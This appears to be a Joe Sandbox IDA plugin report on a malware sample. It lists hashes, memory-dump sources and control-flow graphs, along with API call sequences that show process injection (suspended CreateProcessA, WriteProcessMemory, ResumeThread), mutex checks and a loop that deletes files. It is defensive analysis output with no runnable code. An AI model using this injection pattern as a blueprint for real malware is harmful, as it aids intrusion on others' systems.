• API String ID: 544645111-3459585926
• Opcode ID: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
• Instruction ID: 89b1cf9ac7d55759214d386de343b6a22f623a7ff95fd0c0b6acfd6c7340367f
• Opcode Fuzzy Hash: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
• Instruction Fuzzy Hash: CB327774E012688BDB64CF68C890BDDBBB1BF49304F1481DAD848A7341DB756E85CF95
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• Sleep.KERNEL32(00001388), ref: 001C0959
• RtlExitUserThread.NTDLL(00000000), ref: 001C0961
• OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0981
• GetStartupInfoA.KERNEL32(00000000), ref: 001C0999
  • Part of subcall function 001C09D9: CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
  • Part of subcall function 001C09D9: GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
  • Part of subcall function 001C09D9: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
  • Part of subcall function 001C09D9: DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
  • Part of subcall function 001C09D9: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
  • Part of subcall function 001C09D9: ResumeThread.KERNEL32(?), ref: 001C0AB6
  • Part of subcall function 001C09D9: Sleep.KERNEL32(000003E8), ref: 001C0AC6
  • Part of subcall function 001C09D9: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
Memory Dump Source
• Source File: 0000000C.00000002.1888751495.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
Similarity
                                                                                                                                                                          • API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1099281029-0
                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction ID: 02247e30dbf509db19e564959b2d0d53da4b464b58ceeb9d9e50b48634e6cc8b
                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                          • Instruction Fuzzy Hash: E7517031644354AFEF239F20CC85F9A77B8AF14B44F040199BA49FE0D6DBB0DA94CA65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F2D
                                                                                                                                                                          • Sleep.KERNELBASE(000003E8,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F4B
                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 001C3F5B
                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 001C3F6B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1888751495.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep$HandleModule
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3646095425-0
                                                                                                                                                                          • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                          • Instruction ID: 634a74a46434a642e0226302b98b7da89e65e1ed753664d014aab6768df5a327
                                                                                                                                                                          • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                          • Instruction Fuzzy Hash: EFF05E60988244A6EF413BB0884AF4D36B45F31705F04889CBA59E90D2CF30C6508E72
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                           Control-flow Graph (interactive graph not reproduced; executed/not-executed colouring lost): blocks 1c1345-1c13ec; VirtualProtect at 1c1364, VirtualAlloc at 1c137c, call 1c0e7c at 1c139b, VirtualProtect at 1c13ad
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000020,00000040,?), ref: 001C1372
                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040), ref: 001C1387
                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000020,?,?), ref: 001C13E5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1888751495.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction ID: 24bdabae7abb68ff9a17f5ee70b33f63d9b304115b88680595e81b57cc4b6d8c
                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction Fuzzy Hash: C921AE31944256AFDB11DE78C844B5DBBB5AF05310F054219F955BB5D5D730E800CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                           Control-flow Graph (interactive graph not reproduced; executed/not-executed colouring lost): single block 2243409-2243462; GetVolumeInformationA, call 2243634
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetVolumeInformationA.KERNELBASE(02243405,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 02243409
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1890143342.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2240000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InformationVolume
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2039140958-0
                                                                                                                                                                          • Opcode ID: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                          • Instruction ID: 5f3f8e9eaef86f97a9afefb94e7c3f463a3fda40d11c3e19baa803bc22c4bee9
                                                                                                                                                                          • Opcode Fuzzy Hash: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                          • Instruction Fuzzy Hash: 45F0FE75500154DBEF02EF64C485A9A77F8AF44344F4504C8AA4DBF206CA709555CFA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(02242949,00000008,?,00000000,02242835,00000000), ref: 02242956
                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 02242993
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,022429C1), ref: 022429D0
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,022429F8), ref: 02242A07
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02242A2F), ref: 02242A3E
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02242AB8
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02242AFC
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02242B52
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02242B66
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1890143342.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2240000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 675344582-0
                                                                                                                                                                          • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                          • Instruction ID: 702ab94aa2107b7d8bbc356e04f12854a57921480221bcbfcca8de3264b3a6a9
                                                                                                                                                                          • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                          • Instruction Fuzzy Hash: A5517371410314DEDB2AAFB18D48FAB77BDEF40704F4405A6BE85EA059DF349680CEA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                           Control-flow Graph (interactive graph not reproduced; executed/not-executed colouring lost): blocks 1c292d-1c2b48; LoadLibraryA at 1c292d, VirtualAlloc at 1c2961, lstrcat at 1c29a1 and 1c2a07, DeleteFileA at 1c2a8a, 1c2ace and 1c2b1e, Sleep at 1c2b34 looping back to 1c2a48
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(001C2925,00000008,?,00000000,001C2811,00000000), ref: 001C2932
                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 001C296F
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1888751495.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 675344582-0
                                                                                                                                                                          • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                          • Instruction ID: 5e20f8d1fd77fe1a3bbaf27d3d0f84e3a94bc46b39ba8ee9e7a75b819cd3b3af
                                                                                                                                                                          • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                          • Instruction Fuzzy Hash: 55513471500264AFDB227B608D49FAB77BCEF60705F0444AEFA45EB056DB74DA80CEA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                           Control-flow Graph (interactive graph not reproduced; executed/not-executed colouring lost): blocks 22409fd-2240b16; CreateProcessA at 22409fd, GetThreadContext at 2240a12, VirtualProtectEx at 2240a3a, DuplicateHandle at 2240a65, WriteProcessMemory at 2240aa6, ResumeThread at 2240ad4, Sleep and OpenMutexA at 2240ae5 looping via 2240b0b
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,022409F6,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 02240A04
                                                                                                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 02240A2C
                                                                                                                                                                          • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 02240A57
                                                                                                                                                                          • DuplicateHandle.KERNEL32(000000FF,000000FF,?,02245834,00000000,00000000,00000002), ref: 02240A9C
                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 02240ACA
                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 02240ADA
                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 02240AEA
                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02240B01
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1890143342.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2240000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 617592159-0
                                                                                                                                                                          • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                          • Instruction ID: 46eae0712bd63b703eaec20d4efdb4f34141fb0c34a24f6cfc54088de504fbd0
                                                                                                                                                                          • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                          • Instruction Fuzzy Hash: CB3143316502159FEF2B5F50CC85BA977B8AF04788F0405D4AA49FE0E9DBB09A90CE54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 689 1c09d9-1c09e8 call 1c3653 CreateProcessA 692 1c0aec call 1c0af3 689->692 693 1c09ee-1c0a10 GetThreadContext 689->693 696 1c0af1-1c0af2 692->696 693->692 695 1c0a16-1c0a3b VirtualProtectEx 693->695 695->692 697 1c0a3c-1c0a80 DuplicateHandle 695->697 697->692 699 1c0a82-1c0aae WriteProcessMemory 697->699 699->692 700 1c0ab0-1c0abc ResumeThread 699->700 701 1c0ac1-1c0ae5 Sleep OpenMutexA 700->701 701->696 702 1c0ae7-1c0aea 701->702 702->692 702->701
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
                                                                                                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
                                                                                                                                                                          • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
                                                                                                                                                                          • DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 001C0AB6
                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 001C0AC6
                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1888751495.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 617592159-0
                                                                                                                                                                          • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                          • Instruction ID: d08d0b8b2051c34f5721e4dda066ff8a6639c36971b334a2f4be7756b07d5326
                                                                                                                                                                          • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                          • Instruction Fuzzy Hash: F0312F31640215AFEF239F14CC85FAA77B8AF14744F080199AA49FE0E5DBB0DA90CE54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,022429C1), ref: 022429D0
                                                                                                                                                                            • Part of subcall function 02242A01: lstrcat.KERNEL32(00000000,022429F8), ref: 02242A07
                                                                                                                                                                            • Part of subcall function 02242A01: lstrcat.KERNEL32(00000000,02242A2F), ref: 02242A3E
                                                                                                                                                                            • Part of subcall function 02242A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02242AB8
                                                                                                                                                                            • Part of subcall function 02242A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02242AFC
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02242B52
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02242B66
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1890143342.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2240000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFilelstrcat$Sleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 588723932-0
                                                                                                                                                                          • Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                          • Instruction ID: c44fa0cd3f79ace4e58c5937ddb4e13988b62357f03d43d7a107e99f8183ce9a
                                                                                                                                                                          • Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                          • Instruction Fuzzy Hash: BB413371410724DEDB2AAFB18D48FAB77BDEF40704F404696BE85EA059DE349680CEA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 716 1c29a6-1c2a1a call 1c3653 lstrcat call 1c25e8 call 1c29dd call 1c3653 lstrcat call 1c2501 call 1c2a14 call 1c3653 lstrcat 733 1c2a20-1c2a43 call 1c2b4d call 1c34f7 716->733 737 1c2a48-1c2a4f 733->737 737->733 738 1c2a51-1c2a6d call 1c343f call 1c2683 737->738 743 1c2a6f 738->743 744 1c2a9a-1c2ab1 call 1c2683 738->744 743->744 745 1c2a71-1c2a86 call 1c26f9 743->745 750 1c2ade-1c2af5 call 1c2683 744->750 751 1c2ab3 744->751 745->744 753 1c2a88 745->753 758 1c2af8-1c2b11 call 1c2e97 750->758 759 1c2af7 750->759 751->750 754 1c2ab5-1c2aca call 1c26f9 751->754 753->744 756 1c2a8a-1c2a94 DeleteFileA 753->756 754->750 762 1c2acc 754->762 756->744 765 1c2b34-1c2b48 Sleep 758->765 766 1c2b13-1c2b1c call 1c3057 758->766 759->758 762->750 764 1c2ace-1c2ad8 DeleteFileA 762->764 764->750 765->737 766->765 769 1c2b1e-1c2b2e DeleteFileA 766->769 769->765
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
                                                                                                                                                                            • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                            • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                            • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                            • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1888751495.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFilelstrcat$Sleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 588723932-0
                                                                                                                                                                          • Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                          • Instruction ID: c636e14730fe7c8789ea0b8b2e66408bc148dc9e268f550b67392472ade30f33
                                                                                                                                                                          • Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                          • Instruction Fuzzy Hash: 9441F1715002289FDB22BB618D49FAB77BCEF60705F0444AAEA45E7055DB74DA80CEA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 871 2242a01-2242a3e call 2243677 lstrcat call 2242525 call 2242a38 call 2243677 lstrcat 881 2242a44-2242a67 call 2242b71 call 224351b 871->881 885 2242a6c-2242a73 881->885 885->881 886 2242a75-2242a91 call 2243463 call 22426a7 885->886 891 2242a93 886->891 892 2242abe-2242ad5 call 22426a7 886->892 891->892 893 2242a95-2242aaa call 224271d 891->893 897 2242ad7 892->897 898 2242b02-2242b19 call 22426a7 892->898 893->892 902 2242aac 893->902 897->898 900 2242ad9-2242aee call 224271d 897->900 907 2242b1c-2242b35 call 2242ebb 898->907 908 2242b1b 898->908 900->898 909 2242af0 900->909 902->892 905 2242aae-2242ab8 DeleteFileA 902->905 905->892 913 2242b37-2242b40 call 224307b 907->913 914 2242b58-2242b6c Sleep 907->914 908->907 909->898 911 2242af2-2242afc DeleteFileA 909->911 911->898 913->914 917 2242b42-2242b52 DeleteFileA 913->917 914->885 917->914
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,022429F8), ref: 02242A07
                                                                                                                                                                            • Part of subcall function 02242A38: lstrcat.KERNEL32(00000000,02242A2F), ref: 02242A3E
                                                                                                                                                                            • Part of subcall function 02242A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02242AB8
                                                                                                                                                                            • Part of subcall function 02242A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02242AFC
                                                                                                                                                                            • Part of subcall function 02242A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02242B52
                                                                                                                                                                            • Part of subcall function 02242A38: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02242B66
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1890143342.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2240000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFile$lstrcat$Sleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4261675396-0
                                                                                                                                                                          • Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                          • Instruction ID: 5834a97c4d0ba8d0ad55c70fbb87292d868b41f2cccd0a86f4b2a0fb47d03001
                                                                                                                                                                          • Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                          • Instruction Fuzzy Hash: FD411571410724DEDB2AAFB18D48FAB76BDEF40709F404596BE85EA058DE349680CEA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 824 1c29dd-1c2a1a call 1c3653 lstrcat call 1c2501 call 1c2a14 call 1c3653 lstrcat 834 1c2a20-1c2a43 call 1c2b4d call 1c34f7 824->834 838 1c2a48-1c2a4f 834->838 838->834 839 1c2a51-1c2a6d call 1c343f call 1c2683 838->839 844 1c2a6f 839->844 845 1c2a9a-1c2ab1 call 1c2683 839->845 844->845 846 1c2a71-1c2a86 call 1c26f9 844->846 851 1c2ade-1c2af5 call 1c2683 845->851 852 1c2ab3 845->852 846->845 854 1c2a88 846->854 859 1c2af8-1c2b11 call 1c2e97 851->859 860 1c2af7 851->860 852->851 855 1c2ab5-1c2aca call 1c26f9 852->855 854->845 857 1c2a8a-1c2a94 DeleteFileA 854->857 855->851 863 1c2acc 855->863 857->845 866 1c2b34-1c2b48 Sleep 859->866 867 1c2b13-1c2b1c call 1c3057 859->867 860->859 863->851 865 1c2ace-1c2ad8 DeleteFileA 863->865 865->851 866->838 867->866 870 1c2b1e-1c2b2e DeleteFileA 867->870 870->866
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                            • Part of subcall function 001C2A14: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                            • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                            • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                            • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                            • Part of subcall function 001C2A14: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000C.00000002.1888751495.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFile$lstrcat$Sleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4261675396-0
                                                                                                                                                                          • Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                          • Instruction ID: d6b160bcfa924dc1f1ce780805323c99afb8a852cbc58ab7edcbb3794eecdb08
                                                                                                                                                                          • Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
